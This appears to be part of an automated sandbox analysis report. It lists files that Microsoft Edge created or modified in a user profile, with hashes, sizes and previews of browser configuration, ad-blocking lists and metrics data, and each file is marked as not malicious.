SHA-256:	4D8B86121256B32CE5159A0023730095C008B99B31942236E4476069F6D49983
SHA-512:	E609F23D7B4774CCF0F03FDA77C1F11F97583B111C8A53F4BEBE681AE6679181F41B0A2D6B9992B5DBD556CDDECA5C0BBD6B5E8BFF013A83EFBB2A9EF4F918AE
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"23c6e320-8de9-4f8d-a3f0-2270130e633b"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4c0d1860-2e7e-4083-be99-1f874bc654e6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59172
Entropy (8bit):	6.100253330161878
Encrypted:	false
SSDEEP:	1536:hMk1rT8HRaDPGWv/sxtwuUoEzuTFow7VLyMV/Yosr:hMYrT8xIv/4KJo9hVVeZosr
MD5:	9062F15C00EEBACC1D1DD4C335647CEE
SHA1:	88434E880A01ABCC01819D4A7EB0EBAB8B907540
SHA-256:	12C3EC278188587EA6018981699659E3A201E6E158FB4DED5BCDF3D0676F6CAD
SHA-512:	089FADAB1C69F711565DF5F05A0960F406DBE201FA0400FC4C8D7C0B82698E67E12D69B5407C8D53569529AF3A6D8655FAF0CBFFBA8B68D1A5CBBCA30FBB14E0
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"23c6e320-8de9-4f8d-a3f0-2270130e633b"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4c32c013-b5b7-4a66-a33d-a4eca945f74d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59125
Entropy (8bit):	6.100438606141732
Encrypted:	false
SSDEEP:	1536:hMk1rT8HRaePGWv/sxtwuUoEzuTFow7VLyMV/Yosr:hMYrT8xjv/4KJo9hVVeZosr
MD5:	9E3FC09952BA1CD2FA855B9A41F44A09
SHA1:	85AE4BFA1529C2CB4E14B7BC0E86F2552C3695AD
SHA-256:	5CAC2A4455700222FB00A7CAA9BB93B8963862D2B558570512F9F79381FE79AE
SHA-512:	B2682406DAF709B28BBB27273075DA659CAD8AD7AA1EDE8A4B484A2E64894BDAEE57C03A8D3801819498F401C060D13D3538B7408AECFC62291E216498825BBB
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"23c6e320-8de9-4f8d-a3f0-2270130e633b"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\609c575e-92c2-4561-b488-b519793b573e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	57631
Entropy (8bit):	6.103604448374342
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yniPGWv/sxtw21j7VLyMV/YoskFoz:z/0+zI7ynWv/4K8VeZoskG
MD5:	3BDB7908531BDFCD03DB1CDFC58AE14F
SHA1:	F96E2BF0817F96883C3B40CA643CA24034DD2636
SHA-256:	F8F4E71211F446BA3D73E2B64FE9EBB9B9570CA1853356449275A01350D0C236
SHA-512:	8BB599B8D99BE7751A9496E0F65E739E25F6C69E4B8C8CFA921C825EB566E910C0E1C0388A51951DA044ACE44C7475428DCA56B09D74DF7DFDB26642E05F2930
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\83711bdc-7604-4026-8505-19cbffb601b6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.103040699881289
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn+PGWv/sxtwk7VLyMV/YoskFoz:z/0+zI7ynav/4KOVeZoskG
MD5:	B2E93BED21A580E70DFC88847D06C1CE
SHA1:	89BF64BE6298CE887F62BCCA4164F61136D776B3
SHA-256:	5F3C177DE8A7D254035CB380414A702280CD7B3CFC9F884DE9574BE79DA61686
SHA-512:	5B0989E6D53B291420E2D46C9F86A79820C8BAA15AACE8744C0451EB647B6359107C831AE9788021D1FEDEC6E36018936092FBF59F11A9A3112D8F8F1A3353AF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8d26985d-e99b-4de4-9e5e-405998e27ea6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	57631
Entropy (8bit):	6.103604448374342
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yniPGWv/sxtw21j7VLyMV/YoskFoz:z/0+zI7ynWv/4K8VeZoskG
MD5:	3BDB7908531BDFCD03DB1CDFC58AE14F
SHA1:	F96E2BF0817F96883C3B40CA643CA24034DD2636
SHA-256:	F8F4E71211F446BA3D73E2B64FE9EBB9B9570CA1853356449275A01350D0C236
SHA-512:	8BB599B8D99BE7751A9496E0F65E739E25F6C69E4B8C8CFA921C825EB566E910C0E1C0388A51951DA044ACE44C7475428DCA56B09D74DF7DFDB26642E05F2930
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\059f569b-4108-4384-8ea5-c3c75bd4a5ec.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640156600019748
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7y:fwUQC5VwBIiElEd2K57P7y
MD5:	CF5F0871A3745A85317A43ECCC3E08B5
SHA1:	D09B075E23832A146D9CA0E9C94FA25F1A6FC595
SHA-256:	C3368F87F586F7BA42EA73C4438A60FB2A6F65873CC9801968A370CF025256AD
SHA-512:	2E01C6EE2FE7BBE157F1A5FC172899DE97EFC2F18821E3F1DC1745E8FB4D0D907CCCDCD02F96E036AA5F61FBEDA2C7CB4F2F7F2D687D8D0BFD97CB6B211F715F
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640156600019748
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7y:fwUQC5VwBIiElEd2K57P7y
MD5:	CF5F0871A3745A85317A43ECCC3E08B5
SHA1:	D09B075E23832A146D9CA0E9C94FA25F1A6FC595
SHA-256:	C3368F87F586F7BA42EA73C4438A60FB2A6F65873CC9801968A370CF025256AD
SHA-512:	2E01C6EE2FE7BBE157F1A5FC172899DE97EFC2F18821E3F1DC1745E8FB4D0D907CCCDCD02F96E036AA5F61FBEDA2C7CB4F2F7F2D687D8D0BFD97CB6B211F715F
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-672674CD-1E68.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.047327315950040576
Encrypted:	false
SSDEEP:	192:QgN0m5tmCnOAU5YzJPi6VBKP7+HfgHX/YI5MUYTwghBMNsb+zRQcDsc5n8y08Tcp:DN0UtRBN4AZhqPVMc508T2RGOD
MD5:	FB3B5953CF46BC1D2B632DE2EEC31A8B
SHA1:	58C34160F835530F73B0CB0C8F97B844EC19A0A2
SHA-256:	74D94784808A315B66242A41B3990DB8BB17196C068BB804BB891A67ABDCF7CE
SHA-512:	11CCACB7080B27AF072DAB095A4D2B4D2F599681A885F97E9786B80C4D41F9393C8AFC75C9952F4C812943C764526FD2E052E8E413C8177B81B67A7E62CC4CF1
Malicious:	false
Preview:	...@..@...@.....C.].....@...............xj..0Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".ypeuny20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U..G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ .2.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-672674CE-1F68.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.45309887684247213
Encrypted:	false
SSDEEP:	6144:uHf8nS8zukcFbCzdl1qiJ3sS4OItaHFk:ykc1C3cm
MD5:	18A5BC3313DE32C472BF7A411B55879C
SHA1:	5E7EEFC57123CDE937ED180E42F4B58473497BDF
SHA-256:	42F5D42000A0D2DA6BDBCE65F6FF88B30E3E0044BCDC4969B3BAFF20F97F6255
SHA-512:	F64A066929940F5C32658C5EF12B73C4959EB847CD60F94C67FFA08294DB9891D1897B34216E29A740DE56D8FCF44481343804C02444CF2F2A1C4ADB15A85ECF
Malicious:	false
Preview:	...@..@...@.....C.].....@...................x...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".ypeuny20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U?:K...G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.16517681506792
Encrypted:	false
SSDEEP:	3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
MD5:	C847567DEE0317368C1EC824DE025887
SHA1:	554098F22FEA9282FE1AAB35560849CD6FF546B1
SHA-256:	3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
SHA-512:	A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
Malicious:	false
Preview:	sdPC.....................!...W.F....+F."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\40b7f229-ed3a-45bf-9f38-c8d76dce7740.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4c040dad-348c-4fb5-8109-53b17c3362b7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17105), with no line terminators
Category:	dropped
Size (bytes):	17110
Entropy (8bit):	5.484665480252007
Encrypted:	false
SSDEEP:	192:stQSLJ99QTryDiuabatSuypAs8HyaNPM/krHbDH5Kg1pw8T88Ck8mbV+FY+Qwnln:stQSLPGQSu4As8HtJMwY+w8TF9bGNQwZ
MD5:	2E6D988BEB67D823BC280D0CDE9B9E36
SHA1:	4CD4790D8BCF68B1212ACE1C833773D62B3A4F18
SHA-256:	25C50207E43B3582AB78D070C139FF4B271F75B8DD589400E70509DDF0E1B534
SHA-512:	2DC8AD88B62E31A26DBC470F0746D781E7CE21A6293CDFF9461F18F72DFE6BA935445D0BC12C3EF4802311F410ECB7A506F2DF945EEE598053A287BD8AEB4B36
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375047119078832","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\64912830-582e-4fa7-9fda-daaba52e6ab8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17270), with no line terminators
Category:	dropped
Size (bytes):	17275
Entropy (8bit):	5.481369666276998
Encrypted:	false
SSDEEP:	384:stQSLPGQSu4As8HtJMwY+w8TF9bGNQwLO:sikOXufHzTF9bG+P
MD5:	C8497C54A17CE42EF929F4860BC5436F
SHA1:	05D33FB06D2DD6BFE06D011F22BFC80FDE4FB8E3
SHA-256:	4C69E74F05231EABB0EB0BF7B6BAA5A1B454B834CE2D7BD99215F0C963D2CA0B
SHA-512:	4225DE2E7FFB7E0997F3231D71C483462B9D3D29F537E854981BFA2C200F4613C7FC3511D4D26887F0E0C045C28B29434AE2026C7D746EEB8319D99CE83AA598
Malicious:	false
